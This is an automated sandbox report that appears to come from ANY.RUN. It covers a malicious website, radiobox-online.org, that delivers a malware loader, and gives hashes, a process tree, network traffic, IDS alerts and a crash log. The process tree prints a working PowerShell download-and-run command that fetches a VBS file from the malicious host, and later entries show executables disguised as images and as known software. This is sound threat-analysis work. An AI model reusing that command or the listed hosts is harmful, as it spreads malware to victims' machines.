URL: | https://radiobox-online.org |
Full analysis: | https://app.any.run/tasks/e24945bb-027e-4aee-a3b1-7ea12444439c |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | July 11, 2019, 14:13:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 06A91C9A2B41D18AE12262D69E7E4BE7 |
SHA1: | 1C1CF643427A6ABFAEF155604576BEEB4B692AAC |
SHA256: | 3DA957483194BBDF6BADBB7F3E7EB79BCD5057C932AD8F28444073939A8F7800 |
SSDEEP: | 3:N8XKmNMs:2L |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3076 | "C:\Program Files\Internet Explorer\iexplore.exe" https://radiobox-online.org | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3556 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3076 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3968 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('https://radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3872 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('https://radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2432 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\documentation.vbs" | C:\Windows\System32\WScript.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
3620 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\temp.vbs" | C:\Windows\System32\WScript.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
3896 | "C:\Users\admin\AppData\Local\Temp\temp69.exe" | C:\Users\admin\AppData\Local\Temp\temp69.exe | WScript.exe | |
User: admin Company: Piriform Ltd Integrity Level: MEDIUM Description: CCleaner Exit code: 0 Version: 4, 11, 00, 4619 | ||||
2660 | attrib +h +s C:\Temp | C:\Windows\system32\attrib.exe | — | temp69.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Attribute Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3692 | "C:\Temp\KB24115436.exe" | C:\Temp\KB24115436.exe | temp69.exe | |
User: admin Company: Qihoo 360 Technology Co. Ltd. Integrity Level: MEDIUM Description: 360 Total Security Exit code: 0 Version: 10,0,0,1160 | ||||
4028 | "C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe" -pjf74idD | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe | KB24115436.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3076 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3076 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\03N2YC2E\radiobox-online_org[1].txt | — | |
MD5:— | SHA256:— | |||
3076 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3076 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].jpg | — | |
MD5:— | SHA256:— | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YHFMM8KG4U2Z6E28PO8Q.temp | — | |
MD5:— | SHA256:— | |||
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071120190712\index.dat | dat | |
MD5:10DF8A304F3729376E6D69A0F9D83D14 | SHA256:94BDF3C304CFC707FDE2DDF46956AE4E92AE8834D337ADA1D89CCD76039A1970 | |||
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:915F37EA4D5F1E1B565F90E7FCF14C99 | SHA256:441B9CA9853C8568D247470C709FC9803EA2C14D405D4ACA337B25987F9DE49D | |||
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FXBC15DU\radiobox-online_org[1].htm | html | |
MD5:14BAE31BDB6CE0216A7C13A5F6FFAF83 | SHA256:07F2F4C293EF11D35C1F0ED0816CB022E6DA1407A16197A84A5198015E7AE49C | |||
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:7470B2FFEF14BA4A118CB1782AD461A4 | SHA256:39F398161A64403AFDC5756BB6EDCB17F56CA5947B27CAE35A3CF3FD4E0AD5A8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2268 | client32.exe | POST | 200 | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | binary | 159 b | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | 716 b | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/2.jpg | unknown | html | 716 b | suspicious |
3620 | WScript.exe | GET | 200 | 45.12.215.157:80 | http://45.12.215.157/images/1.jpg | unknown | executable | 2.64 Mb | suspicious |
2432 | WScript.exe | GET | 200 | 45.12.215.157:80 | http://45.12.215.157/src/load2.jpg | unknown | text | 8.70 Kb | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | 716 b | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | 716 b | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/2.jpg | unknown | html | 716 b | suspicious |
2268 | client32.exe | POST | — | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | — | — | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/4.jpg | unknown | html | 716 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2432 | WScript.exe | 88.99.66.31:443 | 2no.co | Hetzner Online GmbH | DE | malicious |
3076 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3556 | iexplore.exe | 88.99.66.31:443 | 2no.co | Hetzner Online GmbH | DE | malicious |
3556 | iexplore.exe | 185.206.213.173:443 | radiobox-online.org | LeaseWeb Netherlands B.V. | NL | unknown |
3872 | powershell.exe | 185.206.213.173:443 | radiobox-online.org | LeaseWeb Netherlands B.V. | NL | unknown |
3076 | iexplore.exe | 185.206.213.173:443 | radiobox-online.org | LeaseWeb Netherlands B.V. | NL | unknown |
2432 | WScript.exe | 45.12.215.157:80 | — | — | — | suspicious |
2268 | client32.exe | 5.45.73.63:4151 | — | Serverius Holding B.V. | NL | suspicious |
3620 | WScript.exe | 45.12.215.157:80 | — | — | — | suspicious |
3896 | temp69.exe | 185.212.130.9:443 | avheaven.icu | Virtual Trade Ltd | NL | malicious |
Domain | IP | Reputation |
---|---|---|
radiobox-online.org |
| malicious |
www.bing.com |
| whitelisted |
2no.co |
| whitelisted |
avheaven.icu |
| malicious |
geo.netsupportsoftware.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3556 | iexplore.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] IP Check Domain SSL certificate |
3556 | iexplore.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] IP Check Domain SSL certificate |
2432 | WScript.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] IP Check Domain SSL certificate |
2432 | WScript.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] IP Check Domain SSL certificate |
3620 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
3620 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
3620 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3620 | WScript.exe | A Network Trojan was detected | ET TROJAN JS/WSF Downloader Dec 08 2016 M4 |
3620 | WScript.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
3620 | WScript.exe | Misc activity | SUSPICIOUS [PTsecurity] PE as Image Content type mismatch |
Process | Message |
---|---|
client32.exe | Exception caught at 6a355a83. Trying minidump.
|
client32.exe | EAX=0004E32C EBX=00000000 ECX=7707CC01 EDX=00000000 ESI=00000C83
EDI=0575FAD0 EBP=0575FAB8 ESP=0575FA88 EIP=6A355A83 FLG=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000 TID=93C
EIP:
F7 7F 04 59 83 F8 0A 7E 03 89 77 04 8B 47 04 5F 5E 5B C9 C3 55 8B EC 51
Callstack:
0x6A355A83 PCIINV.DLL (12.10.0.30): GetInventoryEx + 11063 bytes
0x6A35AEF6 PCIINV.DLL (12.10.0.30): GetInventoryEx + 32682 bytes
0x6A3526B1 PCIINV.DLL (12.10.0.30): Cancel + 2808 bytes
0x77083C45 kernel32.dll (6.01.7601.17514): BaseThreadInitThunk + 18 bytes
0x771737F5 ntdll.dll (6.01.7601.17514): RtlInitializeExceptionChain + 239 bytes
0x771737C8 ntdll.dll (6.01.7601.17514): RtlInitializeExceptionChain + 194 bytes
|
client32.exe | Assert, tid=93c, tid=93c
|